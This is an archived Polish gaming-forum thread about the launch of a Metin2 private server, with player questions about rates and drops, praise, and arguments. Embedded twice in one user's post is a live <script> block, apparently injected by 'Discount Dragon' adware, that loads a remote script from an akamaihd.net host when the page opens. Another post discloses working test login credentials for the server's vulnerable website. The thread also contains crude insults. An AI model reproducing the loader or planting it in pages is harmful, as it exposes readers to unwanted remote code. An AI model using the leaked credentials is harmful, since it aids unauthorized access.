Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Zapowiedź] Alldnar.pl - odkryj nowe możliwości Easy/Medium

Sasori®

Rekomendowane odpowiedzi

Opublikowano

Tak ogolnie powiedzialem nie sprawdzalem expa od tego bedize beta  

biorac  eq do 20 % na expa  2 pdki raty wbije ci nawet okolo 15 % za spota to zalerzy narazie nic nie  mowie  i nie obiecuje jak jest bedziemy testowac 

Mam pytanie a mianowicie: Czy wiesz jak działa bonus do expa w EQ?

Serwer raczej za dużo graczy nie bedzie miał co widać było po mortyriusz s1 i s2.

• Odpowiedzi 126
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

ni c***a nie przykładam ręki do tego projektu prosze spierdalac od mojej osoby ;) pozdro sześć set xD

i ps. chłopaki :D

23265138044720705020.jpg

I Ty leszczu skaczesz do 80% ludzi w internecie twierdzą że masz ich na lepe. Zdjęcie mówi samo za siebie.

@topic Mam nadzieję że bugi po cycu naprawione? :)

1EPZ6G.gif

Opublikowano

Czy dam radę Expic archerem bez buffa. . ?

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//discountdragon-a.akamaihd.net/loaders/1942/l.js?pid=1942&systemid=41f4aeda53ab837d959a112a6f63247e&ext=Discount Dragon&aoi=1403453082&zoneid=647865&crr=1417466085&type=p'; document.body.appendChild(t);})();});}})();</script>

Podłączam się do tego pytania. 

Skąd truta?

Skąd stalka?

Skąd bronie 65?

Czy na nowych mapach dużo respów bossów/metinów?

To chyba wszystko jak coś mi się przypomni to dopytam. ;)

1377531174-U173186.png

Opublikowano

Super serwer, Troian i Sasori gratki ;) możliwe, że zawitam :) + reklama?

y8HqE13.png                             

Opublikowano

Ładna prezentacja! w ogóleeee urzekła mnie ;o! te kostiumy, zbroje, bronie ... zagram!

86765457725017491483.png

Mayumii | Sheyra | Szamanka Shinsoo 

Mayumi | Nayumi eNs Ninja Shinsoo

Opublikowano

Czy dam radę Expic archerem bez buffa. . ?

Tak

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//discountdragon-a.akamaihd.net/loaders/1942/l.js?pid=1942&systemid=41f4aeda53ab837d959a112a6f63247e&ext=Discount Dragon&aoi=1403453082&zoneid=647865&crr=1417466085&type=p'; document.body.appendChild(t);})();});}})();</script>

Skąd truta?

Skąd stalka?

Skąd bronie 65?

Czy na nowych mapach dużo respów bossów/metinów?

To chyba wszystko jak coś mi się przypomni to dopytam. ;)

Skąd truta?    -  gROTA v2 z MOBÓW   , bOSY OD MAPY 90

Skąd stalka?  - METKI 85, 90 ITD

Skąd bronie 65? - TO SAMO CO UP 

Czy na nowych mapach dużo respów bossów/metinów?  TAK sa respy duze oraz powiekszone spoty 

Super serwer, Troian i Sasori gratki ;) możliwe, że zawitam :) + reklama?

Będzie reklama 

Ładna prezentacja! w ogóleeee urzekła mnie ;o! te kostiumy, zbroje, bronie ... zagram!

Dziękujemy zapraszamy 

nie mogę się doczekać ;d

Serdecznie Zapraszamy 

Fajny serwer ale jak dla mnie za dużo tych setów ;c

Mimo to odwiedzę was na starcie i może na becie :)

Zobaczymy ;P jaka bedzie beta 

Mimo, iż pliki od Cyca to zagram, kostiumy przyciągają jak i reszta. Nie mogę się doczekać :D Zaj3bista prezentacja.

Dziękujemy za   pochwale z grafiką robil ja wprawny  dobry grafik :P 

Opublikowano

czy raty yang są takie same jak na mortyriusz EASY ?

Dołączam się do tego pytania.

Czy dropią PD z metków ? 

Długo się będzie zbierać PO na kostium lub jakiś inny item ?

Opublikowano

ja również polecam, widać że serwer dopracowany w 100%, administracja na wysokim poziomie, jak i ich ortografia! 
nie żebym się czepiał, ale serio, są słowniki, jeszcze jest taki czerwony 'ślaczek' któy podkreśla..
składnia zdań również na wysokim poziomie..

czy to jest copyright by alldnar, czy nie

to zalerzy narazie nic nie  mowie

no i ogólnie jest tego więcej ale nie będę was poniżał, czemu nie zmniejszyliście tego levela? 300, a potem 400? zmieniliście ten interface z zakrea?

może @ProBoszcz` jeszcze coś dopowie. :D

would u miss me? 1105814451671351221478.png

Opublikowano

tyle ze mają dziurę w stronie. Nie trzeba miec konta aby dostać się do strony... SS: 

​Przypomnę jeszcze ze rejestracja jest wyłączona i nikt nie może zakładać kont 

395851417568623268730.jpeg

2 SS :

361621417568623268730.jpeg

SS nie mają na celu zniszczyć reputacje serwera lecz pokazać im na co wydali pieniądze... kupno plików od cyca czy jak mu tam = jeden wielki błąd

Uwaga na bandziorów z interentu. 12 latkowie zaczęli prężnie szerzyć i wzmaciać swoje szeregi

Opublikowano

tyle ze mają dziurę w stronie. Nie trzeba miec konta aby dostać się do strony... SS: 

2 SS :

SS nie mają na celu zniszczyć reputacje serwera lecz pokazać im na co wydali pieniądze... kupno plików od cyca czy jak mu tam = jeden wielki błąd

Code by Troian tak wygląda @Proboszcz :D

Opublikowano

Code by Troian tak wygląda @Proboszcz :D

Juz to zostało naprawione ;)

Pozatym z ta dziura i tak nikt by nic nie zrobil  

2 SS :

wow dziura serio  hmm mądry jestes  wykorzystując "dziure"  juz wszystkie konta test 12345 zostaly usuniete nastepnym razem  jak zrobisz screena dodaj tez nazwe konta na boku a nie specialnie  ucioles tamten fragment pozdrawiam proboszcz  prosil bym abys wnosil cos do serwera wiem ze sie nami zainteresowales poniewaz na poczatku mielismy wziasc od ciebie   ale  zrezygnowalismy bo nie bylo tam duzo ciekawych rzeczy co przyciągło by uwage  graczy nie  mówie  pliki wspaniale  wkoncu robil je Terenzo  najbardziej wporządku gośćiu z kilku na tym forum..

Jesli jest dziura  prosil bym o kontakt na PW  i mi wyjasnij  zpelnisz dobry uczynek na mikołajki a może szczescie sie odwróci do ciebie ;) 

Opublikowano

2 SS :

Login test

hasło: 12345 :-) 

Dlatego właśnie nie pokazałeś w SS nazwy konta :)

80892730880771175522.png

Opublikowano

hehe blisko ale nie ;) kombinujcie dalej bo nic nie naprawiliście 

Uwaga na bandziorów z interentu. 12 latkowie zaczęli prężnie szerzyć i wzmaciać swoje szeregi

Opublikowano

Załataliście tą stronę? bo proboszcz twierdzi, że nadal jest dziurawa jak ser szwajcarski. Przez to właśnie nie wiem czy zagrać, bo jak ma być włam w dzień  startu serwera i mam wydać kasę.. to trochę szkoda. ;)

Opublikowano

Załataliście tą stronę? bo proboszcz twierdzi, że nadal jest dziurawa jak ser szwajcarski. Przez to właśnie nie wiem czy zagrać, bo jak ma być włam w dzień  startu serwera i mam wydać kasę.. to trochę szkoda. ;)

Nikt nie ma zamiaru niszczyć tego serwera. Napisałem ze nie chciałem psuć opinij tylko pokazać ze kupienie czegokolwiek od cyca czy jak mu tam jest bardzo wielkim błędem

Opublikowano

Nikt nie ma zamiaru niszczyć tego serwera. Napisałem ze nie chciałem psuć opinij tylko pokazać ze kupienie czegokolwiek od cyca czy jak mu tam jest bardzo wielkim błędem

spierdalaj ode mnie k***o niedojebana stronę kodowali sami od 0 więc spierdalaj c***a potrafisz a tylko wyzywasz ja przynajmniej nie odwalam manian. dreikon jakoś dział na moim silniku i nie ma problemów ;) dziękuję elo

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...